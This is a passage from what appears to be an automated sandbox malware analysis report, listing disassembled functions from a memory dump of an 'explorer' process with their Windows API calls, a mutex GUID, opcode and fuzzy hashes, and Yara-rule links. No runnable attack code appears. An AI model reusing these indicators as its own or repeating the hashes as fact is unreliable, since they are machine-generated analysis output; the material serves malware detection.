                                                                            • SetLastError.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0AC54
                                                                              • Part of subcall function 00C1061C: Sleep.KERNEL32(?,?,00000000,00C0AC17,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C10661
                                                                            • FlsSetValue.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0AC28
                                                                            • free.LIBCMT ref: 00C0AC4B
                                                                              • Part of subcall function 00C0AB2C: _lock.LIBCMT ref: 00C0AB80
                                                                              • Part of subcall function 00C0AB2C: _lock.LIBCMT ref: 00C0AB9F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C0AC3C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                            • String ID:
                                                                            • API String ID: 3106088686-0
                                                                            • Opcode ID: ddd8e8152c1decaf048e94677246e978b5dd2936f37d9d65b913e9f69b8ce697
                                                                            • Instruction ID: caa3be3368085506202ab8d71f6877198ef2ed04c791af25e317b6b3d4b73af4
                                                                            • Opcode Fuzzy Hash: ddd8e8152c1decaf048e94677246e978b5dd2936f37d9d65b913e9f69b8ce697
                                                                            • Instruction Fuzzy Hash: 35018635205B4187FB05AF75E45476832A1BB89BA1F184734DD2A073D6EE3CC889D211
                                                                            Function 00C0B85C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _getptd.LIBCMT ref: 00C0B88D
                                                                              • Part of subcall function 00C0AC68: _amsg_exit.LIBCMT ref: 00C0AC7E
                                                                            • _getptd.LIBCMT ref: 00C0B8AB
                                                                            • _CallSETranslator.LIBCMT ref: 00C0B8F3
                                                                              • Part of subcall function 00C08788: _getptd.LIBCMT ref: 00C087AF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$CallTranslator_amsg_exit
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 1374396951-2084237596
                                                                            • Opcode ID: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                            • Instruction ID: fe8ae2b71dc0c712fc749b28cb3ed1e5bd0de597a671619d0c653ebea3823946
                                                                            • Opcode Fuzzy Hash: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                            • Instruction Fuzzy Hash: 0151DF72304AC5C6CF20DF15E4803ADB360FB81B88F498526EB9E47698DF78C656D700
                                                                            Function 00BF43B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                                                                            • String ID: d
                                                                            • API String ID: 1024630845-2564639436
                                                                            • Opcode ID: 0c8d4fe7f771d713f549316c6493adff74efcb2e32eb21002f5c97629101f9fd
                                                                            • Instruction ID: 46393e030a704d0f7d8014aa9d6571ef32dadfccd3051c769505cdbdda8eb02b
                                                                            • Opcode Fuzzy Hash: 0c8d4fe7f771d713f549316c6493adff74efcb2e32eb21002f5c97629101f9fd
                                                                            • Instruction Fuzzy Hash: 3D51D922309E8581EE78CB44F4E57B6A3A0FBE5701F521636D58E87BA4EF3CC1958744
                                                                            Function 00BF43FE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: a81ead949b251b95a200569ce07e686ebe85f193bfe0fa578606f5f15f53c14d
                                                                            • Instruction ID: 361f6159cb86bfd0c725dc47245e98e424604649bb1e3ffd961b6f0445bb415b
                                                                            • Opcode Fuzzy Hash: a81ead949b251b95a200569ce07e686ebe85f193bfe0fa578606f5f15f53c14d
                                                                            • Instruction Fuzzy Hash: C251DA62309E8481EE78CB45F4E97B663A0FBE5B01F421636D58E87BB4EF3CC1958644
                                                                            Function 00BF3B29 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 8915914118a8f83e044ffa17093a488dd77adb64864bea4865eaae2b93a57a35
                                                                            • Instruction ID: f446cc9fef69829b6618e4a517da2ec9c75a498ac5504f2a463623196c8c62e3
                                                                            • Opcode Fuzzy Hash: 8915914118a8f83e044ffa17093a488dd77adb64864bea4865eaae2b93a57a35
                                                                            • Instruction Fuzzy Hash: 4741B962305E0481EF78CB45F4E9775A3A0FBE8B05F421726A54E877B4EE3CD6558704
                                                                            Function 00C0B3D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$ExceptionRaise_amsg_exit
                                                                            • String ID: csm
                                                                            • API String ID: 4155239085-1018135373
                                                                            • Opcode ID: 5308a84c5b480e16c2d7e933af38e05b88746f3fed8382a7f48b0a7da0dc917f
                                                                            • Instruction ID: ecc6312f4cbb79f791579e3d3feed6ba683c27ba47984c488040c99e03b27622
                                                                            • Opcode Fuzzy Hash: 5308a84c5b480e16c2d7e933af38e05b88746f3fed8382a7f48b0a7da0dc917f
                                                                            • Instruction Fuzzy Hash: 65212B36204681C7D630DF52E04076EB364F789BA5F454226DFAA03B95CF39EA8ADB11
                                                                            Function 00C058F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProcVersion
                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                            • API String ID: 2685220120-196638859
                                                                            • Opcode ID: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
                                                                            • Instruction ID: 86eeaf7c4ea7770c667342f1711c154b9856aaaed803c4c074f2a549a8480a48
                                                                            • Opcode Fuzzy Hash: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
                                                                            • Instruction Fuzzy Hash: 5C11E936228B84C6E764DF14F8447AAB3A0F3C9754F404625AA8E477A8DF7CC649CF40
                                                                            Function 00BE5A70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00BE108D), ref: 00BE5A7B
                                                                            • GetProcAddress.KERNEL32 ref: 00BE5A9A
                                                                            • FreeLibrary.KERNEL32 ref: 00BE5ABA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: SetProcessDPIAware$USER32.DLL
                                                                            • API String ID: 145871493-772676101
                                                                            • Opcode ID: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
                                                                            • Instruction ID: 264a333698bf16e7d1b35ad2874d1d9b83a05bd7e2770fa8497f302bee329b01
                                                                            • Opcode Fuzzy Hash: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
                                                                            • Instruction Fuzzy Hash: A7F09276518A8482E730EB14F88879977B0F789798F441725E68E42669DF7CC69CCB04
                                                                            Function 00C09934 Relevance: 7.6, APIs: 5, Instructions: 115COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _fileno.LIBCMT ref: 00C09951
                                                                              • Part of subcall function 00C1033C: _errno.LIBCMT ref: 00C10345
                                                                              • Part of subcall function 00C1033C: _invalid_parameter_noinfo.LIBCMT ref: 00C10350
                                                                            • _errno.LIBCMT ref: 00C09961
                                                                            • _errno.LIBCMT ref: 00C0997D
                                                                            • _isatty.LIBCMT ref: 00C099DE
                                                                            • _getbuf.LIBCMT ref: 00C099EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                                            • String ID:
                                                                            • API String ID: 2574049805-0
                                                                            • Opcode ID: 8d167e31e7b355235cab2c22b5f9026b19da0db631f1733dee913b6a4d6bec95
                                                                            • Instruction ID: 202e0975809269334b0ea4f03c615c24f6a8ea022db94cfb5094a3dc48a9d93f
                                                                            • Opcode Fuzzy Hash: 8d167e31e7b355235cab2c22b5f9026b19da0db631f1733dee913b6a4d6bec95
                                                                            • Instruction Fuzzy Hash: E9411572310B448ADB189F39D45236D7760E784F64F24421AEBBA473D6EB78CA91D780
                                                                            Function 00BE4050 Relevance: 7.5, APIs: 5, Instructions: 44threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$CloseEventHandle$Thread
                                                                            • String ID:
                                                                            • API String ID: 3315681087-0
                                                                            • Opcode ID: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
                                                                            • Instruction ID: 016d1524d99ed20f6c8b3b4a10929b5b74fa09a69b8c8ef1313c85aea65435f3
                                                                            • Opcode Fuzzy Hash: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
                                                                            • Instruction Fuzzy Hash: F421F734610A8082FB649B21F879F9A37A0F355359F105329D94682AA4CF7D84C8E702
                                                                            Function 00BFB2A0 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event
                                                                            • String ID:
                                                                            • API String ID: 4201588131-0
                                                                            • Opcode ID: 7116d6ac67ac5e04653390e877c86ca050781f403fb5702899428b16223cb2fc
                                                                            • Instruction ID: 71eac5dd277637fb66222cfefef1e92f113efc5e810b01d692fd91f8da6334ac
                                                                            • Opcode Fuzzy Hash: 7116d6ac67ac5e04653390e877c86ca050781f403fb5702899428b16223cb2fc
                                                                            • Instruction Fuzzy Hash: 66213E36608B88C6DB24DB05E4A472EB7A1F3D8B99F505215EA8D43B28CF7CC558CF44
                                                                            Function 00C1404C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_fltout2_invalid_parameter_noinfo
                                                                            • String ID: -
                                                                            • API String ID: 485257318-2547889144
                                                                            • Opcode ID: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
                                                                            • Instruction ID: c88eba061a36a2b7ec72fb2c095da83d1b69b59a982c13d68ca4885ee374b004
                                                                            • Opcode Fuzzy Hash: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
                                                                            • Instruction Fuzzy Hash: FA31FB2230478486DB259F26F84079EB760E796BE4F248216EF9807B99DF3DC5C5EB00
                                                                            Function 00BEEA1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 00BEE9E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleMutexOpenSleep
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2969294566-1719058712
                                                                            • Opcode ID: 06cd6c1d4ad949ede882335bdd68f9c4d4649e32bef2089a6e187e5651b972d9
                                                                            • Instruction ID: c40febfa81f367a6a241e8df4fa1c9fe32823cb1a6581744c02ef0222dfde565
                                                                            • Opcode Fuzzy Hash: 06cd6c1d4ad949ede882335bdd68f9c4d4649e32bef2089a6e187e5651b972d9
                                                                            • Instruction Fuzzy Hash: 92E04630118A8083F3189B12F86836A63F1F789701F20163AE296826A4CF3EC848D702
                                                                            Function 00BEEB19 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 00BEEADE
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                            • String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                                                                            • API String ID: 2551712853-1719058712
                                                                            • Opcode ID: 56610d7bd2b221a8c924720ea80c9a1be984cec2133672938cd12e11cb46a69e
